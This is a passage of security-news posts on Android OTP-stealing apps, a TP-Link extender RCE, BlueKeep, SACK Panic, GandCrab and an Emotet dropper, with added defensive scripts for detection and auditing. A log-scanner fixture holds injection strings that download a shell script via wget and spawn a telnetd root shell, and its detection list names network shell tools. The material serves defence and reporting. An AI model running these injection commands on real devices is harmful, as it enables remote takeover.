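    numbers from notifications posted by targeted apps only."""
    codes = []
    for package, text in notifications:
        if is_targeted_package(package):
            codes.extend(OTP_RE.findall(text))
    return codes


if __name__ == "__main__":
    print("apps with notification access not on the allowlist:",
          unexpected_listeners(SAMPLE_SETTING_VALUE))
    # Constructed notifications as a listener would see them (package, text).
    demo = [
        ("com.google.android.gm", "Your BtcTurk verification code is 483920"),
        ("com.android.messaging", "Code: 7741 expires in 5 minutes"),
        ("com.spotify.music", "Now playing: track 2019"),
    ]
    print("codes an OTP-stealing listener would forward:", scrape_otps(demo))
```

The audit is the part worth automating in a fleet: any package with notification access that is not a known companion app (watch, car, accessibility tool) deserves the same scrutiny as one holding the SMS permission, since it sees the OTP regardless of the lock-screen notification settings.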

Experts at ESET warn that the technique is spreading quickly: it was recently observed in attacks against users of the Turkish Koineks exchange, and ESET believes the same threat actor is behind both campaigns.

“Just last week, we analyzed a malicious app impersonating the Turkish cryptocurrency exchange Koineks (kudos to @DjoNn35 for bringing that app to our attention). It is of interest that the fake Koineks app uses the same malicious technique to bypass SMS and email-based 2FA but lacks the ability to dismiss and silence notifications.”

“According to our analysis, it was created by the same attacker as the “BTCTurk Pro Beta” app analyzed in this blogpost. This shows that attackers are currently working on tuning this technique to achieve the “next best” results to stealing SMS messages.”

Experts believe that crooks will start using this technique against targets in other industries, including banks and financial institutions.

Pierluigi Paganini

(SecurityAffairs – SFA, hacking)

The post Android Apps uses a novel technique to by-pass 2FA and steal Bitcoin appeared first on Security Affairs.

Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders

A zero-day vulnerability affects multiple models of TP-Link Wi-Fi extenders; it could be exploited to execute code remotely on the devices.

Security expert Grzegorz Wypych from IBM X-Force found a zero-day flaw that affects multiple models of TP-Link Wi-Fi extenders.

The Wi-Fi extenders capture the Wi-Fi signal from the main network device and rebroadcast it to areas where the signal is weak.

RE365 TP-Link Wi-Fi extenders

The vulnerability discovered by the expert could be exploited to execute code remotely on vulnerable devices, giving the attacker complete control of the extender with the same privileges as the device’s legitimate user.

“As part of a recent series of vulnerabilities discovered in home routers, IBM X-Force researcher Grzegorz Wypych discovered a zero-day flaw in a TP-Link Wi-Fi extender.” reads the advisory published by IBM. “If exploited, this remote code execution (RCE) vulnerability can allow arbitrary command execution via a malformed user agent field in HTTP headers.”

The RCE flaw affects TP-Link Wi-Fi Extender models RE365, RE650, RE350 and RE500 running firmware version 1.0.2, build 20180213.

The flaw could be exploited by an unauthenticated remote attacker, and the attack doesn’t require privilege escalation because every process on the vulnerable devices already runs with root-level access.

Like many home routers, TP-Link’s Wi-Fi extenders run on the MIPS architecture. The vulnerability is triggered by a single malformed HTTP request: a crafted User-Agent header is enough to execute any shell command on the targeted RE365 Wi-Fi extender.

“The following image shows an open telnet session from a fully compromised device. After connecting to TCP port 4444 we were able to obtain root level shell on the Wi-Fi extender without any privilege escalation, with all processes running as root.” continues the analysis.
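The IBM write-up does not reproduce the request, and the injection strings below are not it; what follows is an added example, not IBM X-Force’s code, of the detection a defender can run today: scan a web server or reverse proxy access log for User-Agent values carrying shell syntax, which is the tell of header-borne command injection whatever the target device. The log lines are constructed in Combined Log Format, the marker list is an assumption to tune per site, and a bare semicolon is deliberately not a marker because every browser User-Agent contains them.

```python
"""Detect header-borne command injection of the kind reported against the
TP-Link extenders by scanning web-server access logs for User-Agent values
that carry shell syntax.  Added example: not IBM X-Force's code and not the
exploit itself; the log lines are constructed in Combined Log Format and the
injection strings are illustrative."""
import re

# Combined Log Format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shell syntax a browser or client UA never legitimately carries (assumption;
# bare ';' is deliberately absent because browser UAs are full of them).
SHELL_MARKERS = [
    r"`",                                    # command substitution
    r"\$\(",                                 # $(...)
    r"\|",                                   # pipe
    r"&&",                                   # command chaining
    r"(?<![\w/.-])(?:wget|curl|tftp|telnetd|busybox|nc)\s+\S",  # tool name followed by an argument
    r"/bin/(?:ba)?sh",                       # explicit shell path
    r"/tmp/",                                # typical drop location on embedded Linux
    r"%0[ad]",                               # URL-encoded CR/LF
]
MARKER_RE = re.compile("|".join(SHELL_MARKERS), re.IGNORECASE)


def parse_line(line: str):
    """Fields of one Combined Log Format record, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def suspicious_ua(ua: str) -> list:
    """The injection markers present in one User-Agent string ([] if clean).
    'curl/7.64.1' stays clean: the tool-name rule needs whitespace and an argument."""
    return [m.group(0) for m in MARKER_RE.finditer(ua)]


def scan(lines):
    """(client ip, request line, markers) for every record with a suspicious UA."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        markers = suspicious_ua(rec["ua"])
        if markers:
            hits.append((rec["ip"], rec["request"], markers))
    return hits


# Constructed sample: two ordinary clients, then two injection attempts.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jun/2019:10:01:02 +0000] "GET / HTTP/1.1" 200 1532 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"',
    '198.51.100.9 - - [18/Jun/2019:10:02:10 +0000] "GET /status HTTP/1.1" 200 88 "-" "curl/7.64.1"',
    '192.0.2.44 - - [18/Jun/2019:10:03:44 +0000] "GET / HTTP/1.1" 200 1532 "-" '
    '"Mozilla/5.0;`wget http://192.0.2.44/bot.sh -O /tmp/b`"',
    '192.0.2.44 - - [18/Jun/2019:10:03:45 +0000] "GET / HTTP/1.1" 200 1532 "-" '
    '"$(telnetd -l /bin/sh -p 4444)"',
]

if __name__ == "__main__":
    for ip, request, markers in scan(SAMPLE_LOG):
        print(f"{ip} {request!r} markers={markers}")
```

On a device like the extender itself there is no such log, so this runs on whatever sits in front of it or on a honeypot; the same marker set applies to any other header (Referer, Host, Cookie) that embedded web servers are known to pass to a shell.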

TP-Link Wi-Fi extenders

“The sort of impact one can expect from such unauthenticated access is, for example, requesting the device to browse to a botnet command and control server or an infection zone,” the analysis adds.

The experts warn of the risk of massive attacks on IoT devices carried out through Mirai-like bots.

TP-Link has already released security patches to address the zero-day flaw, publishing a separate update for each of the impacted Wi-Fi extender models (RE365, RE500, RE650, RE350).

Pierluigi Paganini

(SecurityAffairs – TP-Link Wi-Fi extenders, hacking)

The post Expert found a critical RCE zero-day in TP-Link Wi-Fi Extenders appeared first on Security Affairs.

DHS also issued an alert for the Windows BlueKeep flaw

The Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

After Microsoft and the US NSA, the Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. DHS on Monday issued an alert for the BlueKeep Windows flaw (CVE-2019-0708).

Experts at CISA successfully exploited the BlueKeep flaw on a machine running Windows 2000. The agency urges Microsoft users and administrators to install security patches, disable unnecessary services, enable Network Level Authentication (NLA) where available, and block TCP port 3389.

Below an excerpt from the security advisory:

“CISA encourages users and administrators to review the Microsoft Security Advisory [3] and the Microsoft Customer Guidance for CVE-2019-0708 [4] and apply the appropriate mitigation measures as soon as possible:

  • Install available patches. Microsoft has released security updates to patch this vulnerability. Microsoft has also released patches for a number of OSs that are no longer officially supported, including Windows Vista, Windows XP, and Windows Server 2003. As always, CISA encourages users and administrators to test patches before installation.”

For OSs that do not have patches or systems that cannot be patched, other mitigation steps can be used to help protect against BlueKeep:

  • Upgrade end-of-life (EOL) OSs. Consider upgrading any EOL OSs no longer supported by Microsoft to a newer, supported OS, such as Windows 10.
  • Disable unnecessary services. Disable services not being used by the OS. This best practice limits exposure to vulnerabilities.  
  • Enable Network Level Authentication. Enable Network Level Authentication in Windows 7, Windows Server 2008, and Windows Server 2008 R2. Doing so forces a session request to be authenticated and effectively mitigates against BlueKeep, as exploit of the vulnerability requires an unauthenticated session.
  • Block Transmission Control Protocol (TCP) port 3389 at the enterprise perimeter firewall. Because port 3389 is used to initiate an RDP session, blocking it prevents an attacker from exploiting BlueKeep from outside the user’s network. However, this will block legitimate RDP sessions and may not prevent unauthenticated sessions from being initiated inside a network.
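The NLA recommendation is the one worth verifying from the outside, since a host can have the patch missing and still be safe from an unauthenticated attacker if it refuses non-NLA connections. The script below, an added example and not CISA’s or Microsoft’s code, does what a scanner does: it opens TCP 3389, sends an X.224 Connection Request whose RDP_NEG_REQ asks for legacy RDP security only, and decodes the reply. A server that enforces NLA answers with an RDP_NEG_FAILURE carrying HYBRID_REQUIRED_BY_SERVER; a server that answers with an RDP_NEG_RSP selecting legacy RDP still accepts the unauthenticated session BlueKeep needs. Packet layouts follow MS-RDPBCGR; the replies in the offline demo are constructed, and `probe()` is the only function that touches the network (the host in its comment is assumed).

```python
"""Check whether an RDP listener enforces Network Level Authentication by
sending an X.224 Connection Request that asks for legacy RDP security only
and decoding the negotiation reply: a server that requires NLA answers with
an RDP_NEG_FAILURE carrying HYBRID_REQUIRED_BY_SERVER.
Added example, not CISA's or Microsoft's code.  Packet layouts follow
MS-RDPBCGR (X.224 CR/CC with RDP_NEG_REQ/RSP/FAILURE); the replies used in
the offline demo are constructed."""
import socket
import struct

PROTOCOL_RDP = 0x00000000     # legacy RDP security, what BlueKeep needs
PROTOCOL_SSL = 0x00000001
PROTOCOL_HYBRID = 0x00000002  # CredSSP, i.e. NLA

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03
HYBRID_REQUIRED_BY_SERVER = 0x00000005
FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER",
    0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER",
    0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER",
    0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols: int = PROTOCOL_RDP) -> bytes:
    """TPKT header + X.224 Connection Request TPDU + RDP_NEG_REQ."""
    cookie = b"Cookie: mstshash=probe\r\n"   # routing token; content is arbitrary
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR: code 0xE0, DST-REF, SRC-REF, class option, then variable part
    body = b"\xe0" + b"\x00\x00" + b"\x00\x00" + b"\x00" + cookie + neg_req
    x224 = bytes([len(body)]) + body           # length indicator excludes itself
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data: bytes) -> dict:
    """Decode the server's X.224 Connection Confirm and its RDP_NEG payload."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed X.224 response")
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    neg = data[11:19]        # after LI, code, DST-REF, SRC-REF, class option
    if len(neg) < 8:
        # Old servers send no negotiation block at all: legacy security only.
        return {"type": None, "nla_enforced": False}
    ntype, _flags, _length, value = struct.unpack("<BBHI", neg)
    if ntype == TYPE_RDP_NEG_RSP:
        return {"type": "response", "selected_protocol": value, "nla_enforced": False}
    if ntype == TYPE_RDP_NEG_FAILURE:
        return {"type": "failure",
                "failure_code": FAILURE_CODES.get(value, hex(value)),
                "nla_enforced": value == HYBRID_REQUIRED_BY_SERVER}
    raise ValueError(f"unexpected negotiation type {ntype:#x}")


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> dict:
    """Live check: ask for PROTOCOL_RDP and see whether the server refuses it."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_RDP))
        return parse_connection_confirm(sock.recv(1024))


def demo_reply(neg_type: int, value: int) -> bytes:
    """Constructed server reply, for the offline demonstration only."""
    neg = struct.pack("<BBHI", neg_type, 0, 8, value)
    body = b"\xd0" + b"\x00\x00" + b"\x12\x34" + b"\x00" + neg
    x224 = bytes([len(body)]) + body
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


if __name__ == "__main__":
    nla = parse_connection_confirm(demo_reply(TYPE_RDP_NEG_FAILURE, HYBRID_REQUIRED_BY_SERVER))
    legacy = parse_connection_confirm(demo_reply(TYPE_RDP_NEG_RSP, PROTOCOL_RDP))
    print("NLA-enforcing server:", nla)
    print("server still accepting legacy RDP security:", legacy)
    # Against a real host (assumed reachable):  print(probe("10.0.0.5"))
```

A negotiation response selecting PROTOCOL_SSL rather than PROTOCOL_RDP is not enough either: TLS without CredSSP still lets an unauthenticated client reach the vulnerable channel setup, so only the HYBRID_REQUIRED_BY_SERVER failure (or the patch) should count as mitigated in an inventory.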

The vulnerability, tracked as CVE-2019-0708, affects Windows Remote Desktop Services (RDS) and was addressed by Microsoft with the May 2019 Patch Tuesday updates. BlueKeep is wormable: malware authors could use it to build self-propagating code with WannaCry-like capabilities.

As explained by Microsoft, the vulnerability is pre-authentication and requires no user interaction, which is what would allow malware to spread through target networks in an uncontrolled way.

Several security firms have already developed their own exploit code for this issue but, for obvious reasons, have not disclosed it publicly.

Experts believe it is just a matter of time before threat actors exploit the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

“BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”

It has been estimated that roughly one million Internet-exposed devices are vulnerable to attacks exploiting the BlueKeep Windows vulnerability, and attackers are ready to hit them.

Most of the vulnerable systems are in China, followed by the United States.

Microsoft has released patches for Windows 7, Server 2008, XP and Server 2003. Windows 7 and Server 2008 users can prevent unauthenticated attacks by enabling Network Level Authentication (NLA), and the threat can also be mitigated by blocking TCP port 3389.

Don’t waste time, patch your system!

Pierluigi Paganini

(SecurityAffairs – BlueKeep, hacking)

The post DHS also issued an alert for the Windows BlueKeep flaw appeared first on Security Affairs.

Multiple DoS vulnerabilities affect Linux and FreeBSD

A Netflix researcher has identified several TCP networking vulnerabilities in the FreeBSD and Linux kernels that could be exploited to trigger a DoS condition.

Jonathan Looney, a security expert at Netflix, found three Linux DoS vulnerabilities: two related to the TCP maximum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities, and one related only to MSS.

The most severe flaw, dubbed SACK Panic, could be exploited to remotely trigger a kernel panic, crashing and rebooting vulnerable systems. It affects recent Linux kernels.


The SACK Panic denial-of-service flaw is tracked as CVE-2019-11477; it was rated as important severity and received a CVSS3 base score of 7.5.

“Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.” reads the Netflix’s NFLX-2019-001 security advisory.

“The vulnerabilities specifically relate to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. The most serious, dubbed “SACK Panic,” allows a remotely-triggered kernel panic on recent Linux kernels.

There are patches that address most of these vulnerabilities. If patches can not be applied, certain mitigations will be effective. We recommend that affected parties enact one of those described below, based on their environment.”

The SACK Panic vulnerability affects Linux kernels 2.6.29 and later. An attacker could exploit it by sending a crafted sequence of SACK segments on a TCP connection with a small TCP MSS value, triggering an integer overflow that leads to a kernel panic.

“Apply the patch PATCH_net_1_4.patch. Additionally, versions of the Linux kernel up to, and including, 4.14 require a second patch PATCH_net_1a.patch,” continues Netflix Information Security’s advisory.

Below the advisories published by major Linux distros and cloud service providers:

The good news for Linux users is that most of the issues found by Netflix were already addressed with security patches. Mitigations are also available for those systems that cannot be immediately patched.

Users and administrators can mitigate the flaw by completely disabling SACK processing on the system (setting /proc/sys/net/ipv4/tcp_sack to 0) or by blocking connections with a low MSS; Netflix Information Security provided a series of firewall filters for the latter. Note that the low-MSS filter is only effective while TCP MTU probing is disabled (net.ipv4.tcp_mtu_probing set to 0, which is the default).
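The three settings interact, so a host check is more than reading one sysctl: the MSS filter only counts while MTU probing is off, and disabling SACK removes the need for the filter altogether. The script below is an added example, not Netflix’s code, that folds the kernel release, the two sysctls and an `iptables-save` dump into one verdict. It looks for the mitigations NFLX-2019-001 names (net.ipv4.tcp_sack=0, or an INPUT rule dropping TCP segments with `-m tcpmss --mss 1:500` while net.ipv4.tcp_mtu_probing is 0); whether the kernel is actually patched has to come from the distribution’s package data, which this check does not consult. The sample rule dump is constructed.

```python
"""Assess a Linux host's exposure to the SACK Panic family (CVE-2019-11477,
-11478, -11479) from its kernel release, the tcp_sack and tcp_mtu_probing
sysctls, and its iptables rules.  Added example, not Netflix's code.  The
mitigations it looks for are the ones in NFLX-2019-001: net.ipv4.tcp_sack=0,
or an INPUT rule dropping TCP segments with MSS 1:500, the latter only
counting while net.ipv4.tcp_mtu_probing is 0.  Whether the kernel is
actually patched must come from the distribution's package data; this check
only reports mitigations.  The sample inputs are constructed."""
import os
import re
import subprocess

FIRST_AFFECTED = (2, 6, 29)   # SACK Panic: Linux 2.6.29 and later


def kernel_tuple(release: str) -> tuple:
    """'4.15.0-50-generic' -> (4, 15, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unparseable kernel release {release!r}")
    return tuple(int(x or 0) for x in m.groups())


def in_sack_panic_range(release: str) -> bool:
    return kernel_tuple(release) >= FIRST_AFFECTED


# iptables-save form of the advisory's filter, e.g.
# -A INPUT -p tcp -m tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j DROP
RULE_RE = re.compile(
    r"-A INPUT\b.*-p tcp\b.*-m tcpmss --mss (\d+):(\d+)\b.*-j (?:DROP|REJECT)\b"
)


def has_low_mss_filter(iptables_save: str, ceiling: int = 500) -> bool:
    """True if an INPUT rule drops TCP segments whose MSS lies in 1:<ceiling> or wider."""
    for line in iptables_save.splitlines():
        m = RULE_RE.search(line)
        if m and int(m.group(1)) <= 1 and int(m.group(2)) >= ceiling:
            return True
    return False


def assess(release: str, tcp_sack: int, tcp_mtu_probing: int, iptables_save: str) -> dict:
    """Combine the inputs into a verdict; sysctl values are the raw integers."""
    affected_range = in_sack_panic_range(release)
    sack_disabled = tcp_sack == 0
    mss_filter = has_low_mss_filter(iptables_save)
    # The advisory notes the MSS filter is only effective while MTU probing is off.
    mss_filter_effective = mss_filter and tcp_mtu_probing == 0
    return {
        "kernel": release,
        "in_affected_range": affected_range,
        "sack_disabled": sack_disabled,
        "low_mss_filter": mss_filter,
        "low_mss_filter_effective": mss_filter_effective,
        "mitigated": (not affected_range) or sack_disabled or mss_filter_effective,
    }


def read_sysctl(name: str) -> int:
    """Read an integer sysctl from /proc, e.g. read_sysctl('net.ipv4.tcp_sack')."""
    with open("/proc/sys/" + name.replace(".", "/")) as f:
        return int(f.read().strip())


def assess_live() -> dict:
    """Run the assessment on this host (iptables-save needs root to list rules)."""
    try:
        rules = subprocess.run(["iptables-save"], capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        rules = ""
    return assess(os.uname().release, read_sysctl("net.ipv4.tcp_sack"),
                  read_sysctl("net.ipv4.tcp_mtu_probing"), rules)


# Constructed iptables-save excerpt containing the advisory's filter rule.
SAMPLE_RULES = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --tcp-flags SYN SYN -m tcpmss --mss 1:500 -j DROP
COMMIT
"""

if __name__ == "__main__":
    print(assess("4.15.0-50-generic", tcp_sack=1, tcp_mtu_probing=0, iptables_save=SAMPLE_RULES))
    print(assess("4.15.0-50-generic", tcp_sack=1, tcp_mtu_probing=1, iptables_save=SAMPLE_RULES))
```

The second demo line is the case that catches people: the filter is present, but a host with `net.ipv4.tcp_mtu_probing=1` (sometimes enabled on hosts behind PMTU black holes) still reports as exposed, because MTU probing can itself lower the effective MSS below the filter after the handshake.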

The remaining issues, tracked as CVE-2019-11478 and CVE-2019-11479, were both rated as moderate severity and affect all Linux versions. CVE-2019-11478 can be exploited by sending a crafted sequence of SACKs that fragments the TCP retransmission queue, while CVE-2019-11479 can be exploited by sending crafted packets with low MSS values to trigger excessive resource consumption.

CVE-2019-5599, aka SACK Slowness, affects FreeBSD 12 using the RACK TCP Stack. An attacker could exploit it by delivering a crafted sequence of SACKs which will fragment the RACK send map.

“It is possible to send a crafted sequence of SACKs which will fragment the RACK send map. An attacker may be able to further exploit the fragmented send map to cause an expensive linked-list walk for subsequent SACKs received for that same TCP connection.” continues the advisory.

CVE-2019-5599 can be addressed by applying “split_limit.patch and set the net.inet.tcp.rack.split_limit sysctl to a reasonable value to limit the size of the SACK table.”

Admins could also temporarily disable the RACK TCP stack.

“Good system and application coding and configuration practices (limiting write buffers to the necessary level, monitoring connection memory consumption via SO_MEMINFO, and aggressively closing misbehaving connections) can help to limit the impact of attacks against these kinds of vulnerabilities,” concludes Netflix Information Security.

Pierluigi Paganini

(SecurityAffairs – XSS, hacking)

The post Multiple DoS vulnerabilities affect Linux and FreeBSD appeared first on Security Affairs.

A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware: the NoMoreRansom project has released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a decryptor tool released on the NoMoreRansom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4.

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on www.nomoreransom.org.” reads the press release published by Europol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership between law enforcement agencies from Austria (Bundeskriminalamt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape in early 2018, when experts at the cyber security firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in Russian-speaking hacking communities on the dark web, and researchers noticed that its operators leveraged the RIG and GrandSoft exploit kits to distribute the malware.

In just over a year, its operators released several versions with numerous enhancements, but in June 2019 they announced they were shutting down the operation and told affiliates to stop distributing the ransomware.

GandCrab ransomware V4

In October 2018, experts at the Cybaze Z-Lab have analyzed one of the latest iterations of the infamous GandCrab ransomware, the version 5.0.

The operators claimed to have generated more than $2 billion in ransom payments, earning an average of $2.5 million per week. They also claimed to have netted $150 million, which they say they have invested in legal activities.

Experts at BitDefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim.” reads a blog post published by BitDefender. “An average computer costs from $600 to $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click.”

According to Europol, previously released tools for the GandCrab ransomware have helped more than 30,000 victims recover their data for free and saved roughly $50 million in unpaid ransoms.

The joint efforts have also weakened the operators’ position on the cybercrime market and contributed to the demise and shutdown of the operation. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat.

You can download the GandCrab decryption tool for free at the following address:

https://labs.bitdefender.com/wp-content/uploads/downloads/gandcrab-removal-tool-v1-v4-v5/

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor tools)

The post A free Decryptor tool for GandCrab Ransomware released appeared first on Security Affairs.

NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid

According to The New York Times, the United States planted destructive malware in Russia’s electric power grid.

The New York Times, citing current and former government officials, revealed that the United States planted potentially destructive malware in Russia’s electric power grid.

US cyber units have been probing the Russian power grid with reconnaissance operations since at least 2012, but recently they have also carried out more offensive operations. According to the officials, US Cyber Command attempted to deploy potentially destructive malware inside the Russian power grid.

“Since at least 2012, current and former officials say, the United States has put reconnaissance probes into the control systems of the Russian electric grid.” states the NYT.

“But now the American strategy has shifted more toward offense, officials say, with the placement of potentially crippling malware inside the Russian system at a depth and with an aggressiveness that had never been tried before.”

Russian power grid

The hacking operations are meant to warn the Russian Government about the cyber capabilities of U.S. Cyber Command, and could serve as a deterrent against the continuous interference attributed to Russian state-sponsored hackers. It is important to highlight that there is no evidence that the implants deployed by the US cyber units caused any disruption to the target systems.

President Trump publicly denied the revelations made by the NYT.

The New York Times added that, according to two US officials, Trump had not been briefed in detail about the cyber operations conducted by US Cyber Command. Senior officials may have withheld the details of the cyber attacks on the Russian power grid, fearing a possible reaction from the President because of his relationship with President Putin.

“Two administration officials said they believed Mr. Trump had not been briefed in any detail about the steps to place “implants” — software code that can be used for surveillance or attack — inside the Russian grid.” continues the newspaper.

“Pentagon and intelligence officials described broad hesitation to go into detail with Mr. Trump about operations against Russia for concern over his reaction — and the possibility that he might countermand it or discuss it with foreign officials, as he did in 2017 when he mentioned a sensitive operation in Syria to the Russian foreign minister.”

In July 2018, the US Department of Homeland Security declared that Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and continue to target them.

“In the past few months, Cyber Command’s resolve has been tested. For the past year, energy companies in the United States and oil and gas operators across North America discovered their networks had been examined by the same Russian hackers who successfully dismantled the safety systems in 2017 at Petro Rabigh, a Saudi petrochemical plant and oil refinery.” concludes the NYT.

“The question now is whether placing the equivalent of land mines in a foreign power network is the right way to deter Russia. While it parallels Cold War nuclear strategy, it also enshrines power grids as a legitimate target.”

Pierluigi Paganini

(SecurityAffairs – Russian power grid, hacking)

The post NYT Report: U.S. Cyber units planted destructive Malware in Russian Power Grid appeared first on Security Affairs.

From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated malware sample which made me think about the meaning of ‘Targeted Attack’.

Nowadays, “targeted attack” is mostly used to describe attacks aimed at state assets or business areas. For example, a targeted attack might address the naval industry (MartyMcFly is definitely a great example) or US companies (Botnet Against USA, Canada and Italy is another great example); such attacks are built around specific target sectors. When I looked at the following sample (a clear stereotype of an increasing trend of similar threats), I noticed a paradigm shift from “what to target” to “what to untarget”. In other words, the attacker doesn’t seem to have a clear vision of his desired victims; on the contrary, he has very clear intentions about which victims must be avoided. But let’s start from the beginning.

Looking through the public samples submitted to Yomi (Yoroi’s public sandbox system), the following one caught my eye (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a).

Public Submitted Sample on Yomi

The file looks like a common XLS file with a low antivirus detection rate, as shown in the following image (6/63).

Antivirus Detection Rate

Taking a closer look at the Office file, it’s easy to spot an “Auto Open” procedure in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple breakpoint and a message box to externalize the real payload are enough to expose the second stage, which happens to be written in PowerShell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to work out how to move from the obfuscated version to a plain-text readable format, as shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least from my personal point of view). As you can see from the deobfuscated Stage2 code (previous image), two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated JavaScript stage, let’s call it Stage3_b. We’ll take care of those stages later on; for now let’s focus on the initial conditional branch, which separates the real behavior from the fake one: in other words, it decides whether the real payload runs or not. The second side of the conditional branch is quite normal: match "VirtualBox|VMware|KVM" tries to avoid execution in virtual environments (to evade detection and analysis). The first side is more interesting: (Get-UICulture).Name -match "RO|CN|UA|BY|RU" looks at the victim machine’s locale and decides to attack everybody except Romania, China, Ukraine, Belarus and Russia. (Since PowerShell’s -match is a case-insensitive, unanchored regular expression, the check fires on UI culture names such as ro-RO, zh-CN, uk-UA, be-BY and ru-RU.) So we are facing a one’s complement of a targeted attack. I’d like to call it an “untargeted” attack, which is not the same as an opportunistic attack. Many questions come to mind: for example, why not attack those countries? Does the attacker fear those countries, or does the attacker belong to that area? We’ll probably never get answers to such questions, but we can appreciate this intriguing attack behavior. (BTW, I’m aware this is not the first sample with this characteristic, but I do know it’s an increasing trend.) But let’s move on with the analysis.

Stage3_a

Stage3_a is clearly the last infection stage. According to many antivirus engines it is an ordinary Emotet, so I won’t invest time in this well-known malware.

Stage3_b

This stage is a rather big and obfuscated JavaScript file. The obfuscation relies on three main techniques:

  • Encoded strings. The strings are encoded in different ways, from “to Integer” to “Hexadecimal”.
  • String concatenation and dynamic evaluation. eval is used to dynamically extract values which are then used to decode more strings.
  • String substitutions. Through find-and-replace functions, and loops that extract sub-strings, the attacker hides the clear text inside charset noise.

After some “hand work”, the deobfuscated Stage3_b finally came out. The following image shows the obfuscated and deobfuscated sections side by side. We are still facing one more obfuscated stage, let’s call it Stage4_b, which happens to be, again, an obfuscated PowerShell script... how about that!?

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)


Stage4_b uses the same obfuscation techniques seen in Stage2, so let’s apply the same deobfuscation technique... Hmm, but wait a minute... we already know that: it’s the deobfuscated Stage2! So we have two command and control servers serving the final launching script and gaining persistence on the victim.

Deobfuscated Stage4_b

Conclusion

Even if the sample is quite interesting per se, given its low AV detection rate, that is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to seeing targeted attacks, meaning attacks aimed at specific industries, sectors or states, and opportunistic attacks, meaning attacks spread all over the world without specific targets. Today we might introduce one more attack type, the untargeted attack, meaning an attack on everybody except specific assets, industries or states (as in the case analyzed here).

Further technical details, including IoCs and Yara rules, are reported in the original post published on Marco Ramilli’s blog:

https://marcoramilli.com/2019/06/17/from-targeted-attack-to-untargeted-attack/

About the author Marco Ramilli

